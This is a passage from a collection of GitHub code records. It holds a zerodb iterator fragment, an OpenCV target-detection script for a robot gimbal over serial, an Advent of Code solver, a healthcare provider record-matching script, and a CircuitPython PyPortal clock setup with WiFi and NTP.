enumerate(reprs):\n if i == 0:\n s = \"[\" + s\n else:\n s = \" \" + s\n if i == l - 1:\n s = s + \"]\"\n else:\n s = s + \",\"\n out.append(s)\n return \"\\n\".join(out)\n\n def __unicode__(self):\n return self.__repr__()\n\n\nclass DBList(Sliceable):\n def __init__(self, query_f, db, **kw):\n \"\"\"\n :param function query_f: Function which returns results of the query in format (size, uids)\n :param zerodb.DB db: Currend DB instance\n \"\"\"\n self.db = db\n\n def get_object(uid):\n obj = db._objects[uid]\n obj._p_uid = uid\n return obj\n\n def f():\n self.length, it = query_f()\n return imap(get_object, it)\n\n super(DBList, self).__init__(f, **kw)\n\n\nclass ListPrefetch(Sliceable):\n prefetch_size = 20\n\n def __getitem__(self, key):\n previous_stop = self.stop\n result = super(ListPrefetch, self).__getitem__(key)\n if self.stop != previous_stop:\n # Cache-ahead\n try:\n if isinstance(key, six.integer_types):\n tail = super(ListPrefetch, self).__getitem__(slice(key + 1, key + self.prefetch_size + 1))\n elif isinstance(key, slice):\n if key.stop:\n tail = super(ListPrefetch, self).__getitem__(slice(key.stop + 1, key.stop + self.prefetch_size + 1))\n else:\n tail = []\n except StopIteration:\n # If we've finished right at this element, that's not an error\n tail = []\n\n # Fetching objects needed\n if isinstance(result, list):\n prefetch(result + tail)\n elif isinstance(result, Persistent):\n prefetch([result] + tail)\n return result\n\n\nclass DBListPrefetch(ListPrefetch, DBList):\n def __init__(self, query_f, db, **kw):\n DBList.__init__(self, query_f, db, **kw)\n","repo_name":"nucypher/zerodb","sub_path":"zerodb/util/iter.py","file_name":"iter.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":1567,"dataset":"github-code","pt":"70"}
+{"seq_id":"34794148427","text":"import cv2 as cv\nimport numpy as np\nimport serial\nimport time\n\nser = serial.Serial(\"COM5\",115200,timeout=0.5)\n\nrobot_yaw_angle = 0.0 #机器人云台水平角度值\nrobot_pitch_angle = 0.0 #\nrobot_shoot_speed = 0.0 #\n\ndef get_data():\n while True:\n data_count = ser.inWaiting()\n\n if data_count != 0 :\n if data_count == 7 :\n recv = ser.read(7)\n print(recv)\n tmp_yaw = int.from_bytes(recv[1:3], byteorder='big', signed=True)\n tmp_pitch = int.from_bytes(recv[3:5], byteorder='big', signed=True)\n tmp_shootspeed = int.from_bytes(recv[5:6], byteorder='big', signed=False)\n \n robot_yaw_angle = tmp_yaw/100.0\n robot_pitch_angle = tmp_pitch/100.0\n robot_shoot_speed = tmp_shootspeed/10.0\n \n print(\"yaw-\",robot_yaw_angle,\" pitch-\",robot_pitch_angle,\" shoot-\",robot_shoot_speed) \n\n else:\n ser.reset_input_buffer()\n \n time.sleep(0.1)\n\ndef fill_like_flood(image):\n h , w , c= image.shape\n mask = np.zeros((h+2,w+2),dtype=np.uint8)\n cv.floodFill(image,mask,(10,10),(0,0,0),(50,50,50),(220,220,220),cv.FLOODFILL_FIXED_RANGE)\n return image\n\ndef bag_of_image(image):\n _size = image.size\n image = np.ascontiguousarray(image,dtype=np.int32)\n black_num = np.sum(image == 0)\n white_num = _size - black_num\n return [black_num,white_num]\n\ndef point_predict(detected_point):\n center_x = 472\n center_y = 197\n center_point = [center_x,center_y]\n center_point = np.array(center_point)\n detected_point = np.array(detected_point)\n t = 10 # ms\n speed = 60 # °/s\n angle = speed * t / 1000\n rotation_matrix = np.array([[np.cos(angle),-1 * np.sin(angle)],[np.sin(angle),np.cos(angle)]])\n prediction_point = center_point + np.dot(rotation_matrix,(detected_point - center_point))\n scale = 70 / 92 # cm/pixel\n prediction_point_3d = (prediction_point - center_point) * scale\n prediction_point_3d = np.array([prediction_point_3d[0],prediction_point_3d[1],0])\n return prediction_point_3d\n\n# pitch angle : up and down ; yaw angle : left and right\ndef angle_predict(prediction_point_3d): \n\tv = 15 # m/s\n\tg = 9.8 # m/s^2\n\tcamera_point_3d = np.array([-90,80,800])\n\tprint(camera_point_3d.shape)\n\txz_camera = np.array([camera_point_3d[0],camera_point_3d[2]])\n\txz_prediction = np.array([prediction_point_3d[0],prediction_point_3d[2]])\n\thypotenuse_distance = (np.sum((xz_camera - xz_prediction)**2))**0.5\n\t# yaw angle\n\tvertical_distance = camera_point_3d[2]\n\tyaw_angle = np.arccos(vertical_distance / hypotenuse_distance)\n\t# pitch angle\n\theight = prediction_point_3d[1] - camera_point_3d[1]\n\tpitch_angle = np.arctan((v**2-(v**4-g*(2*height*(v**2) + g*(camera_point_3d[2]**2))))/(g*camera_point_3d[2]))\n\treturn (yaw_angle/3.14*180,pitch_angle/3.14*180)\n\ndef control_shoot(detect_state , yaw_angle ,pitch_angle,shoot_control):\n\tbuf=b'\\xAA' + detect_state.to_bytes(length=1,byteorder='big',signed=False) + int((-1)*yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int((-1)*pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + shoot_control.to_bytes(length=1,byteorder='big',signed=False)\n\tchecksum = 0x00 # 十六进制\n\tfor i in range(1,7):\n\t\tchecksum += buf[i]\n\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\tser.write(buf)\n\tno_shoot = 1\n\tbuf=b'\\xAA' + detect_state.to_bytes(length=1,byteorder='big',signed=False) + int(yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int(pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + no_shoot.to_bytes(length=1,byteorder='big',signed=False)\n\tchecksum = 0x00 # 十六进制\n\tfor i in range(1,7):\n\t\tchecksum += buf[i]\n\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\tser.write(buf)\n\n\ndef main():\n\tcap = cv.VideoCapture(1)\n\tret = True\n\ti = 0\n\tmtx = np.array([[1.03782597e+03,0.00000000e+00,3.40535909e+02],\n\t\t\t[0.00000000e+00,1.03660967e+03,2.52234990e+02],\n\t\t\t[0.00000000e+00,0.00000000e+00,1.00000000e+00]])\n\tdist = np.array([[-1.16797326e-01,-1.73850970e+00,\n\t\t\t2.96839053e-03,-1.12024427e-03,5.30806455e+01]])\n\t\n\t# 云台矫正\n\t'''\n\tdata_count = ser.inWaiting()\n\tif data_count != 0 :\n\t\tif data_count == 7 :\n\t\t\trecv = ser.read(7)\n\t\t\tprint(recv)\n\t\t\ttrue_yaw_angle = 100\n\t\t\ttrue_pitch_angle = 100\n\t\t\ttmp_yaw = int.from_bytes(recv[1:3], byteorder='big', signed=True)\n\t\t\ttmp_pitch = int.from_bytes(recv[3:5], byteorder='big', signed=True)\n\t\t\ttmp_shootspeed = int.from_bytes(recv[5:6], byteorder='big', signed=False)\n\t\t\trobot_yaw_angle = tmp_yaw/100.0\n\t\t\trobot_pitch_angle = tmp_pitch/100.0\n\t\t\trobot_shoot_speed = tmp_shootspeed/10.0\n\t\t\tprint(\"yaw-\",robot_yaw_angle,\" pitch-\",robot_pitch_angle,\" shoot-\",robot_shoot_speed)\n\t\t\trobot_yaw_angle = true_yaw_angle - robot_yaw_angle\n\t\t\trobot_pitch_angle = true_pitch_angle - robot_pitch_angle\n\t\t\trobot_detect_state = 1\n\t\t\trobot_shoot_control = 1\n\t\t\tbuf=b'\\xAA' + robot_detect_state.to_bytes(length=1,byteorder='big',signed=False) + int(robot_yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int(robot_pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + robot_shoot_control.to_bytes(length=1,byteorder='big',signed=False)\n\t\t\tchecksum = 0x00 # 十六进制\n\t\t\tfor i in range(1,6):\n\t\t\t\tchecksum += buf[i]\n\t\t\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\t\t\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\t\t\tser.write(buf)\n\t\telse:\n\t\t\tser.reset_input_buffer()\n\t\t'''\n\twhile ret:\n\t\tret , frame = cap.read()\n\t\tif ret :\n\t\t\tframe = cv.resize(frame, (640,480), interpolation = cv.INTER_LINEAR)\n\t\t\th, w = frame.shape[:2]\n\t\t\tnewcameramtx, roi = cv.getOptimalNewCameraMatrix(mtx, dist, (w,h), 1, (w,h))\n\t\t\tframe = cv.undistort(frame, mtx, dist, None, newcameramtx)\n\t\t\timg_BGR = fill_like_flood(frame)\n\t\t\timg_GRAY = cv.cvtColor(img_BGR,cv.COLOR_BGR2GRAY)\n\t\t\tret_1,img_thresh_1 = cv.threshold(img_GRAY,240,255,cv.THRESH_TOZERO_INV)\n\t\t\tret_2,img_thresh_2 = cv.threshold(img_thresh_1,100,255,cv.THRESH_BINARY)\n\t\t\timg = cv.bitwise_not(img_thresh_2)\n\t\t\tcontours,hierarchy = cv.findContours(img,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)\n\t\t\tcv.drawContours(img,contours,-1,(0,255,0),2)\n\n\t\t\tfor contour in contours:\n\t\t\t\tlw_rate = 0\n\t\t\t\tarea_rate = 0\n\t\t\t\trect = cv.minAreaRect(contour)\n\t\t\t\twidth = max([rect[1][0],rect[1][1]])\n\t\t\t\theight = min([rect[1][0],rect[1][1]])\n\t\t\t\tif height != 0:\n\t\t\t\t\tlw_rate = width / height\n\t\t\t\tarea = cv.contourArea(contour)\n\t\t\t\tif width + height != 0:\n\t\t\t\t\tarea_rate = area / (width + height)\n\n\t\t\t\tif 1.5 < lw_rate and lw_rate < 2.0 and area > 300 and area < 700 :\n\t\t\t\t\ti += 1\n\t\t\t\t\tx_range_1 = int(rect[0][0]) - 30\n\t\t\t\t\tx_range_2 = int(rect[0][0]) + 30\n\t\t\t\t\ty_range_1 = int(rect[0][1]) - 30 \n\t\t\t\t\ty_range_2 = int(rect[0][1]) + 30\n\t\t\t\t\timg_classify = img[y_range_1:y_range_2,x_range_1:x_range_2]\n\t\t\t\t\tfeature = bag_of_image(img_classify)\n\t\t\t\t\tprint(feature)\n\t\t\t\t\tif feature[0] > 1000 and feature[0] < 1500 and feature[1] > 2000 and feature[1] < 3300:\n\t\t\t\t\t\tcv.rectangle(img,(x_range_1,y_range_1),(x_range_2,y_range_2),(0,0,255),2)\n\t\t\t\t\t\tdetected_point = [int(0.5*(x_range_1+x_range_2)),int(0.5*(y_range_1+y_range_2))]\n\t\t\t\t\t\tangle = angle_predict(point_predict(detected_point)) # located in [-pi/2,pi/2]\n\t\t\t\t\t\tprint(angle)\n\t\t\t\t\t\tcontrol_shoot(1,angle[0],angle[1],1)\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\t\t\n\t\tcv.imshow('image',img)\n\t\tif cv.waitKey(20)& 0xFF == 'q':\n\t\t\tbreak\n\n\tcap.release()\n\tcv.destroyAllWindows()\n\nmain()","repo_name":"SC-Levi/Mac_file","sub_path":"opencv/python-opencv/grab.py","file_name":"grab.py","file_ext":"py","file_size_in_byte":7480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14269440361","text":"from typing import Callable\nimport day03.binary as binary\n\n\nBinary = binary.Binary\n\n\nclass Report(tuple[Binary]):\n @property\n def size(self):\n return len(self)\n\n @property\n def n_bits(self):\n return len(self[0])\n\n\ndef build_report(lines: list[str]) -> Report:\n return Report(\n binary.parse(line)\n for line in lines\n )\n\n\ndef get_power_consumption(report: Report):\n return get_gamma_rate(report) * get_epsilon(report)\n\n\ndef get_gamma_rate(report: Report) -> int:\n half = report.size // 2\n binary_result = Binary(\n sum(b[bit] for b in report) > half\n for bit in range(report.n_bits)\n )\n return binary.to_int(binary_result)\n\n\ndef get_epsilon(report: Report) -> int:\n return 2 ** report.n_bits - 1 - get_gamma_rate(report)\n\n\ndef get_life_support_rating(report: Report) -> int:\n return get_co2_scrubber_rating(report) * get_oxygen_generator_rating(report)\n\n\ndef get_oxygen_generator_rating(report: Report) -> int:\n binary_result = _dichotomize(\n report,\n split_predicate=lambda value, j: value[j],\n keep_predicate=lambda v0, v1: v1 if len(v1) >= len(v0) else v0,\n )\n return binary.to_int(binary_result)\n\n\ndef get_co2_scrubber_rating(report) -> int:\n binary_result = _dichotomize(\n report,\n split_predicate=lambda value, j: value[j],\n keep_predicate=lambda v0, v1: v1 if len(v1) < len(v0) else v0,\n )\n return binary.to_int(binary_result)\n\n\ndef _dichotomize(\n report: Report,\n split_predicate: Callable[[Binary, int], bool],\n keep_predicate: Callable[[list[Binary], list[Binary]], list[Binary]],\n) -> Binary:\n binaries = report\n for j in range(report.n_bits):\n left, right = _split_binaries(binaries, lambda b: split_predicate(b, j))\n binaries = keep_predicate(left, right)\n if len(binaries) == 1:\n return binaries[0]\n raise ValueError(f'Did not reach unique value in: {binaries}')\n\n\ndef _split_binaries(\n binaries: list[Binary],\n predicate: Callable[[Binary], bool],\n):\n left: list[Binary] = []\n right: list[Binary] = []\n for b in binaries:\n if predicate(b):\n right.append(b)\n else:\n left.append(b)\n return left, right\n","repo_name":"adjerbetian/AOC2021","sub_path":"day03/diagnostic_report.py","file_name":"diagnostic_report.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70344029986","text":"import pandas as pd\nfrom fuzzywuzzy import fuzz\n\n# Read the CSV file into the DataFrame 'df'\nurl = 'https://raw.githubusercontent.com/benz3927/Healthcare-Data-Queries/main/data/complete.csv'\ndf = pd.read_csv(url)\n\n# Function to calculate similarity score\ndef calculate_similarity_score(col1, col2):\n similarity_score = df.apply(lambda row: fuzz.token_sort_ratio(str(row[col1]), str(row[col2])), axis=1)\n return similarity_score/100\n\n# List of columns to compare and add similarity scores\ncolumns_to_compare = [\n ('NPI_First_Name', 'PECOS_First_Name'),\n ('NPI_Last_Name', 'PECOS_Last_Name'),\n ('NPI_Middle_Initial', 'PECOS_Middle_Initial'),\n ('NPI_Gender_Code', 'PECOS_Gender_Code'),\n ('NPI_Address_Line_1', 'PECOS_Address_Line_1'),\n ('NPI_City', 'PECOS_City'),\n ('NPI_State', 'PECOS_State'),\n ('NPI_Zip_Code', 'PECOS_Zip_Code')\n]\n\n# Reset the index of the DataFrame\ndf.reset_index(drop=True, inplace=True)\n\n# Iterate through the list of columns to compare and calculate similarity scores\nfor col1, col2 in columns_to_compare:\n similarity_score = calculate_similarity_score(col1, col2)\n score_column_name = f'{col1}_String_Distance_Score'\n # Handle missing values and set the string distance score to 0\n similarity_score[df[col1].isnull() | df[col2].isnull()] = 0\n df.insert(df.columns.get_loc(col2) + 1, score_column_name, similarity_score)\n print(f\"Similarity scores for columns {col1} and {col2} added as '{score_column_name}'.\")\n\n# Export the new DataFrame to a CSV file\ndf.to_csv('weighted_similarity_scores.csv', index=False)\n\n# Read the CSV file into the DataFrame 'df'\nurl2 = 'https://raw.githubusercontent.com/benz3927/Healthcare-Data-Queries/main/weighted_similarity_scores.csv'\ndf = pd.read_csv(url2)\n\n# Create a new DataFrame to store matched pairs\noutput_data = []\nrow_labels = []\n\nfor index, row in df.iterrows():\n npi_data = [\n row['Matched_NPI'], row['NPI_First_Name'], row['NPI_Last_Name'], row['NPI_Middle_Initial'],\n row['NPI_Gender_Code'], row['NPI_Address_Line_1'], row['NPI_City'],\n row['NPI_State'], row['NPI_Zip_Code']\n ]\n \n pecos_data = [\n row['Matched_NPI'], row['PECOS_First_Name'], row['PECOS_Last_Name'], row['PECOS_Middle_Initial'],\n row['PECOS_Gender_Code'], row['PECOS_Address_Line_1'], row['PECOS_City'],\n row['PECOS_State'], row['PECOS_Zip_Code']\n ]\n \n output_data.extend([npi_data, pecos_data])\n row_labels.extend(['NPI', 'PECOS'])\n\n# Create a new DataFrame for the matched pairs\noutput_df = pd.DataFrame(output_data, columns=[\n 'NPI', 'First Name', 'Last Name', 'Middle Initial', 'Gender',\n 'Address Line 1', 'City', 'State', 'Zip Code'\n])\noutput_df.insert(0, 'Row Label', row_labels)\n\n# Export the new DataFrame to a CSV file\noutput_csv_path = '/Users/benzhao/Documents/GitHub/Healthcare-Data-Queries/data/matched_pairs.csv'\noutput_df.to_csv(output_csv_path, index=False)\n\nprint(\"New CSV file 'matched_pairs.csv' has been created with matched pairs and alternating row labels.\")\n","repo_name":"benz3927/Healthcare-Data-Queries","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12720245307","text":"import time\nimport board\nimport busio\nimport displayio\nimport terminalio\nimport adafruit_tmp117\nfrom adafruit_ds3231 import DS3231\nfrom digitalio import DigitalInOut\nimport neopixel\nimport adafruit_touchscreen\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_ntp import NTP\nfrom adafruit_pyportal import PyPortal\nfrom adafruit_display_text.bitmap_label import Label\nfrom adafruit_display_shapes.rect import Rect\nfrom adafruit_display_shapes.circle import Circle\nfrom adafruit_display_shapes.triangle import Triangle\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_displayio_layout.layouts.tab_layout import TabLayout\n\n\n# +-------------------------------------------------------+\n# | Definition for variables in the past defined as global|\n# +-------------------------------------------------------+\n# The gVars class is created\n# to elminate the need for global variables.\n\n\nclass gVars:\n def __init__(self):\n self.gVarsDict = {\n 0: \"my_debug\",\n 1: \"rtc\",\n 2: \"temp_sensor\",\n 3: \"lStart\",\n 4: \"o_secs\",\n 5: \"c_secs\",\n 6: \"dt_refresh\",\n 7: \"sDT_old\",\n 8: \"t0\",\n 9: \"t1\",\n 10: \"t2\",\n 11: \"default_dt\",\n 12: \"pge3_lbl_dflt\",\n 13: \"pge4_lbl_dflt\",\n 14: \"online_time_present\",\n 15: \"temp_in_REPL\",\n 16: \"old_temp\",\n 17: \"use_ntp\",\n 18: \"use_txt_in_month\",\n 19: \"use_usa_notation\",\n 20: \"content_sensor_idx\",\n 21: \"ntp_refresh\",\n 22: \"nHH_old\",\n 23: \"next_NTP_sync\",\n 24: \"s_cnt\",\n 25: \"five_min_cnt\",\n 26: \"next_NTP_sync_t1\",\n 27: \"next_NTP_sync_t3\",\n 28: \"temp_in_fahrenheit\",\n }\n\n self.gVars_rDict = {\n \"my_debug\": 0,\n \"rtc\": 1,\n \"temp_sensor\": 2,\n \"lStart\": 3,\n \"o_secs\": 4,\n \"c_secs\": 5,\n \"dt_refresh\": 6,\n \"sDT_old\": 7,\n \"t0\": 8,\n \"t1\": 9,\n \"t2\": 10,\n \"default_dt\": 11,\n \"pge3_lbl_dflt\": 12,\n \"pge4_lbl_dflt\": 13,\n \"online_time_present\": 14,\n \"temp_in_REPL\": 15,\n \"old_temp\": 16,\n \"use_ntp\": 17,\n \"use_txt_in_month\": 18,\n \"use_usa_notation\": 19,\n \"content_sensor_idx\": 20,\n \"ntp_refresh\": 21,\n \"nHH_old\": 22,\n \"next_NTP_sync\": 23,\n \"s_cnt\": 24,\n \"five_min_cnt\": 25,\n \"next_NTP_sync_t1\": 26,\n \"next_NTP_sync_t3\": 27,\n \"temp_in_fahrenheit\": 28,\n }\n\n self.g_vars = {}\n\n # self.clean()\n\n def write(self, s, value):\n if isinstance(s, str):\n if s in self.gVars_rDict:\n n = self.gVars_rDict[s]\n # print(\"myVars.write() \\'{:\" \">20s}\\'found in self.gVars_rDict,\n # key: {}\".format(s, n))\n self.g_vars[n] = value\n else:\n raise KeyError(\n \"variable '{:\" \">20s}' not found in self.gVars_rDict\".format(s)\n )\n else:\n raise TypeError(\n \"myVars.write(): param s expected str, {} received\".format(type(s))\n )\n\n def read(self, s):\n RetVal = None\n if isinstance(s, str):\n if s in self.gVars_rDict:\n n = self.gVars_rDict[s]\n if n in self.g_vars:\n RetVal = self.g_vars[n]\n return RetVal\n\n def clean(self):\n self.g_vars = {\n 0: None,\n 1: None,\n 2: None,\n 3: None,\n 4: None,\n 5: None,\n 6: None,\n 7: None,\n 8: None,\n 9: None,\n 10: None,\n 11: None,\n 12: None,\n 13: None,\n 14: None,\n 15: None,\n 16: None,\n 17: None,\n 18: None,\n 19: None,\n 20: None,\n 21: None,\n 22: None,\n 23: None,\n 24: None,\n 25: None,\n 26: None,\n 27: None,\n 28: None,\n }\n\n def list(self):\n for i in range(0, len(self.g_vars) - 1):\n print(\n \"self.g_vars['{:\"\n \">20s}'] = {}\".format(\n self.gVarsDict[i], self.g_vars[i] if i in self.g_vars else \"None\"\n )\n )\n\n\n# ---------- End of class gVars ------------------------\n\nmyVars = gVars() # create an instance of the gVars class\n\nmyVars.write(\"my_debug\", False)\n\n# Adjust here the date and time that you want the RTC to be set at start:\nmyVars.write(\"default_dt\", time.struct_time((2022, 5, 14, 11, 42, 0, 5, -1, -1)))\n\n# start_time = time.monotonic()\n\n# -------------- Setting myVars elements ----------------------------------\nmyVars.write(\"rtc\", None)\nmyVars.write(\"temp_sensor\", None)\nmyVars.write(\"lStart\", True)\nmyVars.write(\"o_secs\", 0) # old seconds\nmyVars.write(\"c_secs\", 0) # current seconds\n# dt_refresh is used to flag when more or less static elements\n# in datetime stamp have to be refreshed\nmyVars.write(\"dt_refresh\", True)\nmyVars.write(\"sDT_old\", \"\")\nmyVars.write(\"t0\", None)\nmyVars.write(\"t1\", None)\nmyVars.write(\"t2\", None)\n# default_dt already set above\nmyVars.write(\"pge3_lbl_dflt\", \"The third page is fun!\")\nmyVars.write(\"pge4_lbl_dflt\", \"The fourth page is where it's at\")\nmyVars.write(\"online_time_present\", False)\nmyVars.write(\"temp_in_REPL\", False)\nmyVars.write(\"old_temp\", 0.00)\nmyVars.write(\"use_txt_in_month\", True)\nmyVars.write(\"use_usa_notation\", True)\nmyVars.write(\"use_ntp\", True)\nmyVars.write(\"content_sensor_idx\", None)\nmyVars.write(\"ntp_refresh\", True)\nmyVars.write(\"next_NTP_sync\", 0)\nmyVars.write(\"s_cnt\", 0)\nmyVars.write(\"five_min_cnt\", 0)\nmyVars.write(\"next_NTP_sync_t1\", \"Next NTP sync in \")\nmyVars.write(\"next_NTP_sync_t3\", \" (mm:ss)\")\nmyVars.write(\"temp_in_fahrenheit\", True)\n# nHH_old is used to check if the hour has changed.\n# If so we have to re-sync from NTP server\n# (if not using an external RTC)\nmyVars.write(\"nHH_old\", -1)\n\nif myVars.read(\"my_debug\"):\n # print list of all variables in myVars\n myVars.list()\n# -------------------------------------------------------------------------\n# degs_sign = chr(186) # I preferred the real degrees sign which is: chr(176)\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\n# ------------- Screen Setup ------------- #\npyportal = None\ntimeout_cnt = 0\nwhile pyportal is None:\n try:\n pyportal = PyPortal(\n esp=esp, external_spi=spi, debug=True\n ) # esp=esp, external_spi=spi) # create a PyPortal object\n if pyportal is not None:\n break\n except ValueError: # Occurred the error: \"SCK in use\".\n # Also occurred the error \"SPEAKER_ENABLE in use\"\n time.sleep(0.5)\n timeout_cnt += 1\n if timeout_cnt > 10:\n print(\"Timeout occurred while trying to create a PyPortal object\")\n raise\n\nmonths = {\n 0: \"Dum\",\n 1: \"Jan\",\n 2: \"Feb\",\n 3: \"Mar\",\n 4: \"Apr\",\n 5: \"May\",\n 6: \"Jun\",\n 7: \"Jul\",\n 8: \"Aug\",\n 9: \"Sep\",\n 10: \"Oct\",\n 11: \"Nov\",\n 12: \"Dec\",\n}\n\ni2c = board.I2C()\n\nif myVars.read(\"use_ntp\"):\n print(\n \"\\ntest_page_layout.showing_page_index test with I2C Temperature sensor and NTP \\\nsynchronized local time\"\n )\nelse:\n print(\"\\nTabLayout test with I2C Temperature sensor and I2C Realtime clock\")\nprint(\"Add your WiFi SSID, WiFi password and Timezone in file: secrets.h\\n\")\n\nif myVars.read(\"my_debug\"):\n while not i2c.try_lock():\n pass\n\n try:\n while True:\n print(\n \"I2C addresses found:\",\n [hex(device_address) for device_address in i2c.scan()],\n )\n time.sleep(2)\n break\n\n finally: # unlock the i2c bus when ctrl-c'ing out of the loop\n i2c.unlock()\n\n# -------- Setting up SDCard ---------------------\n# Is not needed to be done here: the SPI module is taking care of initializing the SD Card.\n# See: https://andyfelong.com/2019/07/pyportal-access-the-micro-sd-card/#:~:text= \\\n# It%20also%20has%20support%20for%20a%20micro%2DSD%20Card.&text=Software%20support%20 \\\n# for%20PyPortal%20is, \\\n# %2Din%20serial%2Dport%20terminal.77\n#\n# NOTE: there is also the board.SD_CARD_DETECT pin (33)(but I don't know yet how to interface it)\n####\n\n# you'll need to pass in an io username and key\n# Get wifi details and more from a secrets.py file\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n raise\n\nif myVars.read(\"my_debug\"):\n if esp.status == adafruit_esp32spi.WL_IDLE_STATUS:\n print(\"ESP32 found and in idle mode\")\n print(\"Firmware vers.\", esp.firmware_version)\n print(\"MAC addr:\", [hex(i) for i in esp.MAC_address])\n\n for ap in esp.scan_networks():\n print(\"\\t%s\\t\\tRSSI: %d\" % (str(ap[\"ssid\"], \"utf-8\"), ap[\"rssi\"]))\n\n# Get our username, key and desired timezone\nlocation = secrets.get(\"timezone\", None)\n\nprint(\"\\nConnecting to AP...\")\nwhile not esp.is_connected:\n try:\n esp.connect_AP(secrets[\"ssid\"], secrets[\"password\"])\n except RuntimeError as e:\n print(\"could not connect to AP, retrying: \", e)\n continue\nprint(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\nprint(\"Please wait...\")\nif myVars.read(\"my_debug\"):\n print(\"My IP address is\", esp.pretty_ip(esp.ip_address))\n print(\n \"IP lookup adafruit.com: %s\"\n % esp.pretty_ip(esp.get_host_by_name(\"adafruit.com\"))\n )\n print(\"Ping google.com: %d ms\" % esp.ping(\"google.com\"))\n\n\ndef refresh_from_NTP():\n # Fetch and set the microcontroller's current UTC time\n # keep retrying until a valid time is returned\n timeout_cnt2 = 0\n while not ntp.valid_time:\n ntp.set_time(tz_offset)\n if myVars.read(\"my_debug\"):\n print(\"Failed to obtain time, retrying in 5 seconds...\")\n timeout_cnt2 += 1\n time.sleep(5)\n if timeout_cnt2 > 10:\n print(\"Timeout while trying to get ntp datetime to set the internal rtc\")\n break\n\n if myVars.read(\"my_debug\"):\n print(\"Value ntp.valid_time = \", ntp.valid_time)\n\n if ntp.valid_time:\n myVars.write(\"online_time_present\", True)\n myVars.write(\"ntp_refresh\", False)\n # Get the current time in seconds since Jan 1, 1970 and correct it for local timezone\n # (defined in secrets.h)\n ntp_current_time = time.time()\n if myVars.read(\"my_debug\"):\n print(\"Seconds since Jan 1, 1970: {} seconds\".format(ntp_current_time))\n\n # Convert the current time in seconds since Jan 1, 1970 to a struct_time\n myVars.write(\"default_dt\", time.localtime(ntp_current_time))\n if not myVars.read(\"my_debug\"):\n print(\n \"Internal clock synchronized from NTP pool, now =\",\n myVars.read(\"default_dt\"),\n )\n\n\nif myVars.read(\"use_ntp\"):\n # Initialize the NTP object\n ntp = NTP(esp)\n\n location = secrets.get(\"timezone\", location)\n if myVars.read(\"my_debug\"):\n print(\"location (from secrets.h) = \", location)\n if location == \"Europe/Lisbon\":\n if myVars.read(\"my_debug\"):\n print(\"Using timezone Europe/Lisbon\")\n tz_offset = 3600\n else:\n tz_offset = 0\n\n refresh_from_NTP()\n\npixel = neopixel.NeoPixel(board.NEOPIXEL, 1, brightness=1)\nWHITE = 0xFFFFFF\nRED = 0xFF0000\nYELLOW = 0xFFFF00\nGREEN = 0x00FF00\nBLUE = 0x0000FF\nPURPLE = 0xFF00FF\nBLACK = 0x000000\n\n# ---------- Sound Effects ------------- #\nsoundDemo = \"/sounds/sound.wav\"\nsoundBeep = \"/sounds/beep.wav\"\nsoundTab = \"/sounds/tab.wav\"\n\n# ------------ Touchscreen setup --------------- #\n# See: https://learn.adafruit.com/making-a-pyportal-user-interface-displayio/display\ndisplay = board.DISPLAY # create the display object\ndisplay.rotation = 0\n# screen_width = 320\n# screen_height = 240\nscreen_width = display.width\nscreen_height = display.height\n# -------Rotate 0:\n# Note @PaulskPt dd 2022-05-13\n# After using a touchscreen calibration script, the values are as follows:\n# (XL, YU, XR, YD) are: (6935, 10496, 60127, 57631)\nts = adafruit_touchscreen.Touchscreen(\n board.TOUCH_XL,\n board.TOUCH_XR,\n board.TOUCH_YD,\n board.TOUCH_YU, # #calibration=((5200, 59000), (5800, 57000)),\n calibration=((6815, 60095), (10520, 58007)),\n size=(screen_width, screen_height),\n) # was: screen_width, screen_height\n\"\"\"\n# If Rotate is 90:\n# -------Rotate 90:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_YU, board.TOUCH_YD,\n board.TOUCH_XL, board.TOUCH_XR,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_height, screen_width))\n# If Rotate 180:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_XR, board.TOUCH_XL,\n board.TOUCH_YU, board.TOUCH_YD,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_width, screen_height))\n\n# If Rotate 270:\nts = adafruit_touchscreen.Touchscreen(board.TOUCH_XL, board.TOUCH_XR,\n board.TOUCH_YD, board.TOUCH_YU,\n calibration=((5200, 59000), (5800, 57000)),\n size=(screen_height, screen_width))\n\"\"\"\n# -----------------------------------\n\n# create and show main_group\nmain_group = displayio.Group() # The Main Display Group\n\ndisplay.root_group = main_group\n\n# font = 